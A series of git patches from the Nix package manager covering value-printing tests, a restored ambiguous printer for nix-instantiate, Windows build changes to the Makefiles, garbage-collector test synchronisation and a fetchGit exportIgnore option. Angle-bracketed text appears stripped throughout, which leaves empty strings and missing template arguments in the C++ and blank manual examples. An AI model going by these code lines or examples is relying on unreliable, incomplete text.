.ansiColors = true, + .force = true, + .derivationPaths = true, + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAssert) +{ + ExprVar eFalse(state.symbols.create("false")); + eFalse.bindVars(state, state.staticBaseEnv); + ExprInt eInt(1); + + ExprAssert expr(noPos, &eFalse, &eInt); + + Value v; + state.mkThunk_(v, &expr); + + test(v, + ANSI_RED "«" ANSI_RED "error:" ANSI_NORMAL " assertion '" ANSI_MAGENTA "false" ANSI_NORMAL "' failed»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsList) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + Value vList; + state.mkList(vList, 5); + vList.bigList.elems[0] = &vOne; + vList.bigList.elems[1] = &vTwo; + vList.bigList.size = 3; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_CYAN "2" ANSI_NORMAL 
" " ANSI_MAGENTA "«nullptr»" ANSI_NORMAL " ]", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsLambda) +{ + Env env { + .up = nullptr, + .values = { } + }; + PosTable::Origin origin((std::monostate())); + auto posIdx = state.positions.add(origin, 1, 1); + auto body = ExprInt(0); + auto formals = Formals {}; + + ExprLambda eLambda(posIdx, createSymbol("a"), &formals, &body); + + Value vLambda; + vLambda.mkLambda(&env, &eLambda); + + test(vLambda, + ANSI_BLUE "«lambda @ «none»:1:1»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); + + eLambda.setName(createSymbol("puppy")); + + test(vLambda, + ANSI_BLUE "«lambda puppy @ «none»:1:1»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPrimOp) +{ + PrimOp primOp{ + .name = "puppy" + }; + Value v; + v.mkPrimOp(&primOp); + + test(v, + ANSI_BLUE "«primop puppy»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPrimOpApp) +{ + PrimOp primOp{ + .name = "puppy" + }; + Value vPrimOp; + vPrimOp.mkPrimOp(&primOp); + + Value v; + v.mkPrimOpApp(&vPrimOp, nullptr); + + test(v, + ANSI_BLUE "«partially applied primop puppy»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsThunk) +{ + Value v; + v.mkThunk(nullptr, nullptr); + + test(v, + ANSI_MAGENTA "«thunk»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsBlackhole) +{ + Value v; + v.mkBlackhole(); + + test(v, + ANSI_RED "«potential infinite recursion»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrsRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("a"), &vEmpty); + 
builder.insert(state.symbols.create("b"), &vEmpty); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ a = { }; b = " ANSI_MAGENTA "«repeated»" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsListRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + Value vList; + state.mkList(vList, 3); + vList.bigList.elems[0] = &vEmpty; + vList.bigList.elems[1] = &vEmpty; + vList.bigList.size = 2; + + test(vList, + "[ { } " ANSI_MAGENTA "«repeated»" ANSI_NORMAL " ]", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, listRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + Value vList; + state.mkList(vList, 3); + vList.bigList.elems[0] = &vEmpty; + vList.bigList.elems[1] = &vEmpty; + vList.bigList.size = 2; + + test(vList, "[ { } «repeated» ]", PrintOptions { }); + test(vList, + "[ { } { } ]", + PrintOptions { + .trackRepeated = false + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrsElided) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("one"), &vOne); + builder.insert(state.symbols.create("two"), &vTwo); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «1 attribute elided»" ANSI_NORMAL "}", + PrintOptions { + .ansiColors = true, + .maxAttrs = 1 + }); + + Value vThree; + vThree.mkInt(3); + + builder.insert(state.symbols.create("three"), &vThree); + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «2 attributes elided»" ANSI_NORMAL "}", + PrintOptions { + .ansiColors = true, + .maxAttrs = 1 + }); +} + +TEST_F(ValuePrintingTests, 
ansiColorsListElided) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + Value vList; + state.mkList(vList, 4); + vList.bigList.elems[0] = &vOne; + vList.bigList.elems[1] = &vTwo; + vList.bigList.size = 2; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «1 item elided»" ANSI_NORMAL "]", + PrintOptions { + .ansiColors = true, + .maxListItems = 1 + }); + + Value vThree; + vThree.mkInt(3); + + vList.bigList.elems[2] = &vThree; + vList.bigList.size = 3; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «2 items elided»" ANSI_NORMAL "]", + PrintOptions { + .ansiColors = true, + .maxListItems = 1 + }); } } // namespace nix From df84dd4d8dd3fd6381ac2ca3064432ab31a16b79 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 9 Jan 2024 11:13:45 -0800 Subject: [PATCH 220/654] Restore ambiguous value printer for `nix-instantiate` The Nix team has requested that this output format remain unchanged. I've added a warning to the man page explaining that `nix-instantiate --eval` output will not parse correctly in many situations. --- doc/manual/src/command-ref/nix-instantiate.md | 80 ++++++++++---- src/libexpr/print-ambiguous.cc | 100 ++++++++++++++++++ src/libexpr/print-ambiguous.hh | 24 +++++ src/nix-env/user-env.cc | 3 +- src/nix-instantiate/nix-instantiate.cc | 6 +- tests/functional/lang/eval-okay-print.exp | 2 +- 6 files changed, 189 insertions(+), 26 deletions(-) create mode 100644 src/libexpr/print-ambiguous.cc create mode 100644 src/libexpr/print-ambiguous.hh diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index e1b4a3e80..483150aa8 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -35,13 +35,50 @@ standard input. - `--parse`\ Just parse the input files, and print their abstract syntax trees on - standard output in ATerm format. 
+ standard output as a Nix expression. - `--eval`\ Just parse and evaluate the input files, and print the resulting values on standard output. No instantiation of store derivations takes place. + > **Warning** + > + > This option produces ambiguous output which is not suitable for machine + > consumption. For example, these two Nix expressions print the same result + > despite having different types: + > + > ```console + > $ nix-instantiate --eval --expr '{ a = {}; }' + > { a = ; } + > $ nix-instantiate --eval --expr '{ a = ; }' + > { a = ; } + > ``` + > + > For human-readable output, `nix eval` (experimental) is more informative: + > + > ```console + > $ nix-instantiate --eval --expr 'a: a' + > + > $ nix eval --expr 'a: a' + > «lambda @ «string»:1:1» + > ``` + > + > For machine-readable output, the `--xml` option produces unambiguous + > output: + > + > ```console + > $ nix-instantiate --eval --xml --expr '{ foo = ; }' + > + > + > + > + > + > + > + > + > ``` + - `--find-file`\ Look up the given files in Nix’s search path (as specified by the `NIX_PATH` environment variable). If found, print the corresponding @@ -61,11 +98,11 @@ standard input. - `--json`\ When used with `--eval`, print the resulting value as an JSON - representation of the abstract syntax tree rather than as an ATerm. + representation of the abstract syntax tree rather than as a Nix expression. - `--xml`\ When used with `--eval`, print the resulting value as an XML - representation of the abstract syntax tree rather than as an ATerm. + representation of the abstract syntax tree rather than as a Nix expression. The schema is the same as that used by the [`toXML` built-in](../language/builtins.md). @@ -133,28 +170,29 @@ $ nix-instantiate --eval --xml --expr '1 + 2' The difference between non-strict and strict evaluation: ```console -$ nix-instantiate --eval --xml --expr 'rec { x = "foo"; y = x; }' -... - - - - - - -... 
+$ nix-instantiate --eval --xml --expr '{ x = {}; }' + + + + + + + + ``` Note that `y` is left unevaluated (the XML representation doesn’t attempt to show non-normal forms). ```console -$ nix-instantiate --eval --xml --strict --expr 'rec { x = "foo"; y = x; }' -... - - - - - - -... +$ nix-instantiate --eval --xml --strict --expr '{ x = {}; }' + + + + + + + + + ``` diff --git a/src/libexpr/print-ambiguous.cc b/src/libexpr/print-ambiguous.cc new file mode 100644 index 000000000..07c398dd2 --- /dev/null +++ b/src/libexpr/print-ambiguous.cc @@ -0,0 +1,100 @@ +#include "print-ambiguous.hh" +#include "print.hh" +#include "signals.hh" + +namespace nix { + +// See: https://github.com/NixOS/nix/issues/9730 +void printAmbiguous( + Value &v, + const SymbolTable &symbols, + std::ostream &str, + std::set *seen, + int depth) +{ + checkInterrupt(); + + if (depth <= 0) { + str << "«too deep»"; + return; + } + switch (v.type()) { + case nInt: + str << v.integer; + break; + case nBool: + printLiteralBool(str, v.boolean); + break; + case nString: + printLiteralString(str, v.string_view()); + break; + case nPath: + str << v.path().to_string(); // !!! escaping? 
+ break; + case nNull: + str << "null"; + break; + case nAttrs: { + if (seen && !v.attrs->empty() && !seen->insert(v.attrs).second) + str << "«repeated»"; + else { + str << "{ "; + for (auto & i : v.attrs->lexicographicOrder(symbols)) { + str << symbols[i->name] << " = "; + printAmbiguous(*i->value, symbols, str, seen, depth - 1); + str << "; "; + } + str << "}"; + } + break; + } + case nList: + if (seen && v.listSize() && !seen->insert(v.listElems()).second) + str << "«repeated»"; + else { + str << "[ "; + for (auto v2 : v.listItems()) { + if (v2) + printAmbiguous(*v2, symbols, str, seen, depth - 1); + else + str << "(nullptr)"; + str << " "; + } + str << "]"; + } + break; + case nThunk: + if (!v.isBlackhole()) { + str << ""; + } else { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. + str << "«potential infinite recursion»"; + } + break; + case nFunction: + if (v.isLambda()) { + str << ""; + } else if (v.isPrimOp()) { + str << ""; + } else if (v.isPrimOpApp()) { + str << ""; + } + break; + case nExternal: + str << *v.external; + break; + case nFloat: + str << v.fpoint; + break; + default: + printError("Nix evaluator internal error: printAmbiguous: invalid value type"); + abort(); + } +} + +} diff --git a/src/libexpr/print-ambiguous.hh b/src/libexpr/print-ambiguous.hh new file mode 100644 index 000000000..50c260a9b --- /dev/null +++ b/src/libexpr/print-ambiguous.hh @@ -0,0 +1,24 @@ +#pragma once + +#include "value.hh" + +namespace nix { + +/** + * Print a value in the deprecated format used by `nix-instantiate --eval` and + * `nix-env` (for manifests). 
+ * + * This output can't be changed because it's part of the `nix-instantiate` API, + * but it produces ambiguous output; unevaluated thunks and lambdas (and a few + * other types) are printed as Nix path syntax like ``. + * + * See: https://github.com/NixOS/nix/issues/9730 + */ +void printAmbiguous( + Value &v, + const SymbolTable &symbols, + std::ostream &str, + std::set *seen, + int depth); + +} diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 3d07cab7a..973b6ee2b 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -108,8 +108,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, environment. */ auto manifestFile = ({ std::ostringstream str; - std::set seen; - printAmbiguous(manifest, state.symbols, str, &seen, std::numeric_limits::max()); + printAmbiguous(manifest, state.symbols, str, nullptr, std::numeric_limits::max()); // TODO with C++20 we can use str.view() instead and avoid copy. std::string str2 = str.str(); StringSource source { str2 }; diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 9b36dccc6..87bc986e8 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -1,9 +1,11 @@ #include "globals.hh" +#include "print-ambiguous.hh" #include "shared.hh" #include "eval.hh" #include "eval-inline.hh" #include "get-drvs.hh" #include "attr-path.hh" +#include "signals.hh" #include "value-to-xml.hh" #include "value-to-json.hh" #include "store-api.hh" @@ -24,7 +26,6 @@ static int rootNr = 0; enum OutputKind { okPlain, okXML, okJSON }; - void processExpr(EvalState & state, const Strings & attrPaths, bool parseOnly, bool strict, Bindings & autoArgs, bool evalOnly, OutputKind output, bool location, Expr * e) @@ -56,7 +57,8 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } else { if (strict) state.forceValueDeep(vRes); - vRes.print(state, std::cout); + std::set seen; + printAmbiguous(vRes, 
state.symbols, std::cout, &seen, std::numeric_limits::max()); std::cout << std::endl; } } else { diff --git a/tests/functional/lang/eval-okay-print.exp b/tests/functional/lang/eval-okay-print.exp index aa1b2379e..0d960fb70 100644 --- a/tests/functional/lang/eval-okay-print.exp +++ b/tests/functional/lang/eval-okay-print.exp @@ -1 +1 @@ -[ null «primop toString» «partially applied primop deepSeq» «lambda @ /pwd/lang/eval-okay-print.nix:1:61» [ [ «repeated» ] ] ] +[ null [ [ «repeated» ] ] ] From 34bb6dcab1334ebc6ac0afaf4fe6f9e6f13de4b5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:14:13 -0500 Subject: [PATCH 221/654] makefiles: Support `.exe` executable prefix on Windows --- mk/programs.mk | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/mk/programs.mk b/mk/programs.mk index 6235311e9..623caaf55 100644 --- a/mk/programs.mk +++ b/mk/programs.mk @@ -1,5 +1,11 @@ programs-list := +ifdef HOST_WINDOWS + EXE_EXT = .exe +else + EXE_EXT = +endif + # Build a program with symbolic name $(1). The program is defined by # various variables prefixed by ‘$(1)_’: # @@ -31,7 +37,7 @@ define build-program _srcs := $$(sort $$(foreach src, $$($(1)_SOURCES), $$(src))) $(1)_OBJS := $$(addprefix $(buildprefix), $$(addsuffix .o, $$(basename $$(_srcs)))) _libs := $$(foreach lib, $$($(1)_LIBS), $$(foreach lib2, $$($$(lib)_LIB_CLOSURE), $$($$(lib2)_PATH))) - $(1)_PATH := $$(_d)/$$($(1)_NAME) + $(1)_PATH := $$(_d)/$$($(1)_NAME)$(EXE_EXT) $$(eval $$(call create-dir, $$(_d))) @@ -42,7 +48,7 @@ define build-program ifdef $(1)_INSTALL_DIR - $(1)_INSTALL_PATH := $$($(1)_INSTALL_DIR)/$$($(1)_NAME) + $(1)_INSTALL_PATH := $$($(1)_INSTALL_DIR)/$$($(1)_NAME)$(EXE_EXT) $$(eval $$(call create-dir, $$($(1)_INSTALL_DIR))) From af0345df3688494d1e53a659eacb16fc4b9915b5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:14:13 -0500 Subject: [PATCH 222/654] makefiles: Do some HOST_CYGWIN -> HOST_WINDOWS These bits are not Cygwin-specific. 
--- mk/libraries.mk | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/mk/libraries.mk b/mk/libraries.mk index 515a481f6..b99ba2782 100644 --- a/mk/libraries.mk +++ b/mk/libraries.mk @@ -3,7 +3,7 @@ libs-list := ifdef HOST_DARWIN SO_EXT = dylib else - ifdef HOST_CYGWIN + ifdef HOST_WINDOWS SO_EXT = dll else SO_EXT = so @@ -65,7 +65,7 @@ define build-library $(1)_OBJS := $$(addprefix $(buildprefix), $$(addsuffix .o, $$(basename $$(_srcs)))) _libs := $$(foreach lib, $$($(1)_LIBS), $$($$(lib)_PATH)) - ifdef HOST_CYGWIN + ifdef HOST_WINDOWS $(1)_INSTALL_DIR ?= $$(bindir) else $(1)_INSTALL_DIR ?= $$(libdir) @@ -85,7 +85,7 @@ define build-library endif else ifndef HOST_DARWIN - ifndef HOST_CYGWIN + ifndef HOST_WINDOWS $(1)_LDFLAGS += -Wl,-z,defs endif endif From 90fdbfc601a8d005f57c984284c5922dc38480eb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 12:41:42 -0500 Subject: [PATCH 223/654] Build Windows DLLs with `-Wl,--export-all-symbols` This is not the most elegant, but will match the SOs in exporting everything for now. Later we can refine what is public/private to clean up the interface. 
--- Makefile | 37 ++++++++++++++++++++++++++++++++----- mk/lib.mk | 33 +-------------------------------- mk/platform.mk | 32 ++++++++++++++++++++++++++++++++ 3 files changed, 65 insertions(+), 37 deletions(-) create mode 100644 mk/platform.mk diff --git a/Makefile b/Makefile index 1fdb6e897..7bbfbddbe 100644 --- a/Makefile +++ b/Makefile @@ -1,8 +1,12 @@ +# External build directory support + include mk/build-dir.mk -include $(buildprefix)Makefile.config clean-files += $(buildprefix)Makefile.config +# List makefiles + ifeq ($(ENABLE_BUILD), yes) makefiles = \ mk/precompiled-headers.mk \ @@ -43,6 +47,8 @@ makefiles += \ tests/functional/plugins/local.mk endif +# Miscellaneous global Flags + OPTIMIZE = 1 ifeq ($(OPTIMIZE), 1) @@ -52,9 +58,29 @@ else GLOBAL_CXXFLAGS += -O0 -U_FORTIFY_SOURCE endif +include mk/platform.mk + +ifdef HOST_WINDOWS + # Windows DLLs are stricter about symbol visibility than Unix shared + # objects --- see https://gcc.gnu.org/wiki/Visibility for details. + # This is a temporary sledgehammer to export everything like on Unix, + # and not detail with this yet. + # + # TODO do not do this, and instead do fine-grained export annotations. + GLOBAL_LDFLAGS += -Wl,--export-all-symbols +endif + +GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src + +# Include the main lib, causing rules to be defined + include mk/lib.mk -# Must be included after `mk/lib.mk` so isn't the default target. +# Fallback stub rules for better UX when things are disabled +# +# These must be defined after `mk/lib.mk`. Otherwise the first rule +# incorrectly becomes the default target. + ifneq ($(ENABLE_UNIT_TESTS), yes) .PHONY: check check: @@ -69,8 +95,11 @@ installcheck: @exit 1 endif -# Must be included after `mk/lib.mk` so rules refer to variables defined -# by the library. Rules are not "lazy" like variables, unfortunately. +# Documentation or else fallback stub rules. 
+# +# The documentation makefiles be included after `mk/lib.mk` so rules +# refer to variables defined by `mk/lib.mk`. Rules are not "lazy" like +# variables, unfortunately. ifeq ($(ENABLE_DOC_GEN), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) @@ -89,5 +118,3 @@ internal-api-html: @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." @exit 1 endif - -GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src diff --git a/mk/lib.mk b/mk/lib.mk index a5a067e48..10ce8d436 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -12,38 +12,7 @@ man-pages := install-tests := install-tests-groups := -ifdef HOST_OS - HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) - ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) - HOST_MINGW = 1 - HOST_WINDOWS = 1 - endif - ifeq ($(HOST_KERNEL), cygwin) - HOST_CYGWIN = 1 - HOST_WINDOWS = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) - HOST_DARWIN = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) - HOST_FREEBSD = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) - HOST_NETBSD = 1 - HOST_UNIX = 1 - endif - ifeq ($(HOST_KERNEL), linux) - HOST_LINUX = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) - HOST_SOLARIS = 1 - HOST_UNIX = 1 - endif -endif +include mk/platform.mk # Hack to define a literal space. 
space := diff --git a/mk/platform.mk b/mk/platform.mk new file mode 100644 index 000000000..fe960dedf --- /dev/null +++ b/mk/platform.mk @@ -0,0 +1,32 @@ +ifdef HOST_OS + HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) + ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) + HOST_MINGW = 1 + HOST_WINDOWS = 1 + endif + ifeq ($(HOST_KERNEL), cygwin) + HOST_CYGWIN = 1 + HOST_WINDOWS = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) + HOST_DARWIN = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) + HOST_FREEBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) + HOST_NETBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(HOST_KERNEL), linux) + HOST_LINUX = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) + HOST_SOLARIS = 1 + HOST_UNIX = 1 + endif +endif From 3e237598342dee46188c83fba49cc30d509ee553 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 12:38:55 +0100 Subject: [PATCH 224/654] gc-non-blocking.sh: Add explanation Also name the _NIX_TEST_GC_SYNC environment variables logically. --- src/libstore/gc.cc | 10 +++++----- tests/functional/gc-non-blocking.sh | 20 ++++++++++++++------ 2 files changed, 19 insertions(+), 11 deletions(-) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index bd64e238d..80e036e7e 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -511,7 +511,7 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) /* Synchronisation point to test ENOENT handling in addTempRoot(), see tests/gc-non-blocking.sh. */ - if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + if (auto p = getEnv("_NIX_TEST_GC_SYNC_1")) readFile(*p); /* Start the server for receiving new roots. */ @@ -637,6 +637,10 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) roots.insert(root.first); } + /* Synchronisation point for testing, see tests/functional/gc-non-blocking.sh. 
*/ + if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + readFile(*p); + /* Helper function that deletes a path from the store and throws GCLimitReached if we've deleted enough garbage. */ auto deleteFromStore = [&](std::string_view baseName) @@ -783,10 +787,6 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) } }; - /* Synchronisation point for testing, see tests/functional/gc-non-blocking.sh. */ - if (auto p = getEnv("_NIX_TEST_GC_SYNC")) - readFile(*p); - /* Either delete all garbage paths, or just the specified paths (for gcDeleteSpecific). */ if (options.action == GCOptions::gcDeleteSpecific) { diff --git a/tests/functional/gc-non-blocking.sh b/tests/functional/gc-non-blocking.sh index 7f2aebb8b..ec280badb 100644 --- a/tests/functional/gc-non-blocking.sh +++ b/tests/functional/gc-non-blocking.sh @@ -6,10 +6,14 @@ needLocalStore "the GC test needs a synchronisation point" clearStore -fifo=$TEST_ROOT/test.fifo -mkfifo "$fifo" +# This FIFO is read just after the global GC lock has been acquired, +# but before the root server is started. +fifo1=$TEST_ROOT/test2.fifo +mkfifo "$fifo1" -fifo2=$TEST_ROOT/test2.fifo +# This FIFO is read just after the roots have been read, but before +# the actual GC starts. +fifo2=$TEST_ROOT/test.fifo mkfifo "$fifo2" dummy=$(nix store add-path ./simple.nix) @@ -17,19 +21,23 @@ dummy=$(nix store add-path ./simple.nix) running=$TEST_ROOT/running touch $running -(_NIX_TEST_GC_SYNC=$fifo _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & +# Start GC. +(_NIX_TEST_GC_SYNC_1=$fifo1 _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & pid=$! sleep 2 -(sleep 1; echo > $fifo2) & +# Delay the start of the root server to check that the build below +# correctly handles ENOENT when connecting to the root server. +(sleep 1; echo > $fifo1) & pid2=$! +# Start a build. This should not be blocked by the GC in progress. 
outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; mkDerivation { name = \"non-blocking\"; - buildCommand = \"set -x; test -e $running; mkdir \$out; echo > $fifo\"; + buildCommand = \"set -x; test -e $running; mkdir \$out; echo > $fifo2\"; }") wait $pid From 7c6f093abcb68a2d07cd6450672c120f33ab96d6 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 13:00:53 +0100 Subject: [PATCH 225/654] .data() -> .c_str() to be on the safe side --- src/nix/develop.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 5e25833eb..1f2891378 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -603,7 +603,7 @@ struct CmdDevelop : Common, MixEnvironment setEnviron(); // prevent garbage collection until shell exits - setenv("NIX_GCROOT", gcroot.data(), 1); + setenv("NIX_GCROOT", gcroot.c_str(), 1); Path shell = "bash"; @@ -648,7 +648,7 @@ struct CmdDevelop : Common, MixEnvironment // Override SHELL with the one chosen for this environment. // This is to make sure the system shell doesn't leak into the build environment. 
- setenv("SHELL", shell.data(), 1); + setenv("SHELL", shell.c_str(), 1); // If running a phase or single command, don't want an interactive shell running after // Ctrl-C, so don't pass --rcfile From 4d0ecda33e29520756fdb7ccb7549205ed1afd52 Mon Sep 17 00:00:00 2001 From: DavHau Date: Sun, 19 Nov 2023 20:37:42 +0700 Subject: [PATCH 226/654] fetchTree/fetchGit: add test for .gitattributes ...with the intention to prevent future regressions in fetchGit --- tests/functional/fetchGit.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index 4985c7764..f0438f548 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -229,6 +229,15 @@ rev_tag2=$(git -C $repo rev-parse refs/tags/tag2) [[ $rev_tag2_nix = $rev_tag2 ]] unset _NIX_FORCE_HTTP +# Ensure .gitattributes is respected +touch $repo/not-exported-file +echo "/not-exported-file export-ignore" >> $repo/.gitattributes +git -C $repo add not-exported-file .gitattributes +git -C $repo commit -m 'Bla6' +rev5=$(git -C $repo rev-parse HEAD) +path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"$rev5\"; }).outPath") +[[ ! -e $path12/not-exported-file ]] + # should fail if there is no repo rm -rf $repo/.git (! nix eval --impure --raw --expr "(builtins.fetchGit \"file://$repo\").outPath") From ce6d58a97cf6f975a0b930605605fab153445b22 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 27 Nov 2023 22:34:41 +0100 Subject: [PATCH 227/654] git fetcher: Add exportIgnore parameter Enabled for fetchGit, which historically had this behavior, among other behaviors we do not want in fetchGit. fetchTree disables this parameter by default. It can choose the simpler behavior, as it is still experimental. I am not confident that the filtering implementation is future proof. It should reuse a source filtering wrapper, which I believe Eelco has already written, but not merged yet. 
--- src/libexpr/primops/fetchTree.cc | 14 ++++++++ src/libfetchers/git-utils.cc | 57 +++++++++++++++++++++++++++----- src/libfetchers/git-utils.hh | 4 +-- src/libfetchers/git.cc | 15 +++++++-- tests/functional/fetchGit.sh | 5 ++- 5 files changed, 81 insertions(+), 14 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index eb2df8626..e00c4f190 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -39,6 +39,10 @@ void emitTreeAttrs( attrs.alloc("submodules").mkBool( fetchers::maybeGetBoolAttr(input.attrs, "submodules").value_or(false)); + if (input.getType() == "git") + attrs.alloc("exportIgnore").mkBool( + fetchers::maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)); + if (!forceDirty) { if (auto rev = input.getRev()) { @@ -112,6 +116,11 @@ static void fetchTree( attrs.emplace("type", type.value()); + if (params.isFetchGit) { + // Default value; user attrs are assigned later. + attrs.emplace("exportIgnore", Explicit{true}); + } + for (auto & attr : *args[0]->attrs) { if (attr.name == state.sType) continue; state.forceValue(*attr.value, attr.pos); @@ -593,6 +602,11 @@ static RegisterPrimOp primop_fetchGit({ A Boolean parameter that specifies whether submodules should be checked out. + - `exportIgnore` (default: `true`) + + A Boolean parameter that specifies whether `export-ignore` from `.gitattributes` should be applied. + This approximates part of the `git archive` behavior. + - `shallow` (default: `false`) A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. 
